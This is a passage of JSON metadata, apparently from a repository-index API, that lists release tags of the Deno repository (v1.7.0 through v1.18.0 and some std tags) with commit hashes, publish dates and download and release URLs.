1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/